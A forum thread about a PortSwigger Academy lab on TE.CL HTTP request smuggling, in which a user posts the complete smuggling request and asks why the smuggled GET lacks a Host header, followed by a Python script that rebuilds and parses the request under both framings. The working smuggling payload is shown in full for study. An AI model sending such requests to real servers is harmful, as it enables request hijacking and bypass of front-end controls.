Burp Suite User Forum

Lab: HTTP request smuggling, basic TE.CL vulnerability

Mikhail | Last updated: Sep 19, 2024 03:33PM UTC

Hello! Can you help me understand one interesting moment in this lab? In this lab, the smuggling request will be successful.

POST / HTTP/1.1
Host: 0a5e00970446a1b38002d12d005f0084.web-security-academy.net
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

68
GET /post?postId=9 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=11
0

But how can we send the smuggled request without a Host header? It is necessary for HTTP/1.1.

Ben, PortSwigger Agent | Last updated: Sep 23, 2024 01:10PM UTC

Hi Mikhail, Are you able to clarify your question, please?

Mikhail | Last updated: Sep 23, 2024 03:16PM UTC

Hi Ben! This part of the request is waiting for a second request on the backend:

GET /post?postId=9 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=11
0

And it's OK! We are sending the second part. The backend has got something like this:

GET /post?postId=9 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=11
0

POST / HTTP/1.1
Host: 0a5e00970446a1b38002d12d005f0084.web-security-academy.net
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
...

And it works! We have a response for this request: GET /post?postId=9 HTTP/1.1 ....

BUT! If we look at this request attentively, we don't find the "Host:" header. How can we do this request without the "Host" header? HTTP/1.1 can't send requests without the "Host" header.

Ben, PortSwigger Agent | Last updated: Sep 26, 2024 05:26PM UTC

Hi Mikhail, Unfortunately, we are unable to provide personal support or tutoring to Academy users in order to explain concepts beyond the learning materials provided in the Web Academy. If you would like to discuss this with other Burp and Web Academy users we do now have a Discord server where you can interact with others. You can join this below: https://discord.com/invite/portswigger
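
An added illustration, not part of the thread and not PortSwigger's code: the request from the first post, reduced to the headers that affect framing, is split once by chunked encoding (front-end view) and once by Content-Length (back-end view), and the leftover bytes are checked for a Host header. The host `lab.example` and all function names are constructed for this example.

```python
# Constructed sample: the thread's request with headers trimmed; lab.example is a placeholder host.
SMUGGLED = (b"GET /post?postId=9 HTTP/1.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n\r\nx=11")
REQUEST = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\n"
           b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
           + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n")

def parse_headers(head):
    """Map lower-cased header names to values, skipping the request line."""
    fields = (line.split(b":", 1) for line in head.split(b"\r\n")[1:])
    return {name.strip().lower(): value.strip() for name, value in fields}

def split_te(raw):
    """Front-end view: frame the body by chunked encoding. Returns (body, leftover)."""
    _, _, rest = raw.partition(b"\r\n\r\n")
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)    # ignore chunk extensions
        if size == 0:
            return body, rest[2:]                    # drop the final CRLF (no trailers here)
        body, rest = body + rest[:size], rest[size + 2:]

def split_cl(raw):
    """Back-end view: frame the body by Content-Length. Returns (body, leftover)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    n = int(parse_headers(head)[b"content-length"])
    return rest[:n], rest[n:]

def audit(raw):
    """Report where the two framings disagree and what the leftover bytes look like."""
    outer = parse_headers(raw.partition(b"\r\n\r\n")[0])
    left_te, left_cl = split_te(raw)[1], split_cl(raw)[1]
    head, _, body = left_cl.partition(b"\r\n\r\n")
    inner = parse_headers(head)
    return {
        "cl_and_te": b"content-length" in outer and b"transfer-encoding" in outer,
        "leftover_te": len(left_te),     # 0: the front end sees one complete request
        "leftover_cl": len(left_cl),     # >0: bytes the back end reads as a new request
        "inner_request_line": head.split(b"\r\n")[0].decode(),
        "inner_has_host": b"host" in inner,
        "inner_body_shortfall": int(inner.get(b"content-length", 0)) - len(body),
    }

if __name__ == "__main__":
    for key, value in audit(REQUEST).items():
        print(f"{key}: {value}")
```

`inner_body_shortfall` is the number of body bytes the leftover request still expects from whatever arrives next on the connection. `inner_has_host` is the value a server enforcing the HTTP/1.1 rule of answering 400 to a request without Host would act on.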
